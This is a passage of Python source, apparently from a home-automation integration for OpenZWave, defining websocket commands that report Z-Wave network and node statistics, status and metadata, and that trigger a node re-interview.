vol.Required(TYPE): "ozw/network_statistics",
vol.Optional(OZW_INSTANCE, default=1): vol.Coerce(int),
}
)
def websocket_network_statistics(hass, connection, msg):
"""Get Z-Wave network statistics."""
manager = hass.data[DOMAIN][MANAGER]
statistics = manager.get_instance(msg[OZW_INSTANCE]).get_statistics().data
node_count = len(
manager.get_instance(msg[OZW_INSTANCE]).collections["node"].collection
)
connection.send_result(
msg[ID],
dict(statistics, ozw_instance=msg[OZW_INSTANCE], node_count=node_count),
)
@websocket_api.websocket_command(
{
vol.Required(TYPE): "ozw/node_status",
vol.Required(NODE_ID): vol.Coerce(int),
vol.Optional(OZW_INSTANCE, default=1): vol.Coerce(int),
}
)
def websocket_node_status(hass, connection, msg):
"""Get the status for a Z-Wave node."""
try:
node = get_node_from_manager(
hass.data[DOMAIN][MANAGER], msg[OZW_INSTANCE], msg[NODE_ID]
)
except NotFoundError as err:
connection.send_error(
msg[ID],
websocket_api.const.ERR_NOT_FOUND,
err.args[0],
)
return
connection.send_result(
msg[ID],
{
ATTR_NODE_QUERY_STAGE: node.node_query_stage,
NODE_ID: node.node_id,
ATTR_IS_ZWAVE_PLUS: node.is_zwave_plus,
ATTR_IS_AWAKE: node.is_awake,
ATTR_IS_FAILED: node.is_failed,
ATTR_NODE_BAUD_RATE: node.node_baud_rate,
ATTR_IS_BEAMING: node.is_beaming,
ATTR_IS_FLIRS: node.is_flirs,
ATTR_IS_ROUTING: node.is_routing,
ATTR_IS_SECURITYV1: node.is_securityv1,
ATTR_NODE_BASIC_STRING: node.node_basic_string,
ATTR_NODE_GENERIC_STRING: node.node_generic_string,
ATTR_NODE_SPECIFIC_STRING: node.node_specific_string,
ATTR_NODE_MANUFACTURER_NAME: node.node_manufacturer_name,
ATTR_NODE_PRODUCT_NAME: node.node_product_name,
ATTR_NEIGHBORS: node.neighbors,
OZW_INSTANCE: msg[OZW_INSTANCE],
},
)
@websocket_api.websocket_command(
{
vol.Required(TYPE): "ozw/node_metadata",
vol.Required(NODE_ID): vol.Coerce(int),
vol.Optional(OZW_INSTANCE, default=1): vol.Coerce(int),
}
)
def websocket_node_metadata(hass, connection, msg):
"""Get the metadata for a Z-Wave node."""
try:
node = get_node_from_manager(
hass.data[DOMAIN][MANAGER], msg[OZW_INSTANCE], msg[NODE_ID]
)
except NotFoundError as err:
connection.send_error(
msg[ID],
websocket_api.const.ERR_NOT_FOUND,
err.args[0],
)
return
connection.send_result(
msg[ID],
{
"metadata": node.meta_data,
NODE_ID: node.node_id,
OZW_INSTANCE: msg[OZW_INSTANCE],
},
)
@websocket_api.websocket_command(
{
vol.Required(TYPE): "ozw/node_statistics",
vol.Required(NODE_ID): vol.Coerce(int),
vol.Optional(OZW_INSTANCE, default=1): vol.Coerce(int),
}
)
def websocket_node_statistics(hass, connection, msg):
"""Get the statistics for a Z-Wave node."""
manager = hass.data[DOMAIN][MANAGER]
stats = (
manager.get_instance(msg[OZW_INSTANCE]).get_node(msg[NODE_ID]).get_statistics()
)
connection.send_result(
msg[ID],
{
NODE_ID: msg[NODE_ID],
"send_count": stats.send_count,
"sent_failed": stats.sent_failed,
"retries": stats.retries,
"last_request_rtt": stats.last_request_rtt,
"last_response_rtt": stats.last_response_rtt,
"average_request_rtt": stats.average_request_rtt,
"average_response_rtt": stats.average_response_rtt,
"received_packets": stats.received_packets,
"received_dup_packets": stats.received_dup_packets,
"received_unsolicited": stats.received_unsolicited,
OZW_INSTANCE: msg[OZW_INSTANCE],
},
)
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "ozw/refresh_node_info",
vol.Optional(OZW_INSTANCE, default=1): vol.Coerce(int),
vol.Required(NODE_ID): vol.Coerce(int),
}
)
def websocket_refresh_node_info(hass, connection, msg):
"""Tell OpenZWave to re-interview a node."""
manager = hass.data[DOMAIN][MANAGER]
options = manager.options
@callback
def forward_node(node):
"""Forward node events to websocket."""
if node.node_id != msg[NODE_ID]:
return
forward_data = {
"type": "node_updated",
ATTR_NODE_QUERY_STAGE: node.node_query_stage,
}
connection.send_message(websocket_api.event_message(msg["id"], forward_data))
@callback
def async_cleanup() -> None:
"""Remove signal listeners."""
for unsub in unsubs:
unsub()
connection.subscriptions[msg["id"]] = async_cleanup
unsubs = [
options.listen(EVENT_NODE_CHANGED, forward_node),
options.listen(EVENT_NODE_ADDED, forward_node),
]
instance = manager.get_instance(msg[OZW_INSTANCE])
instance.refresh_node(msg[NODE_ID])
connection.send_result(msg["id"])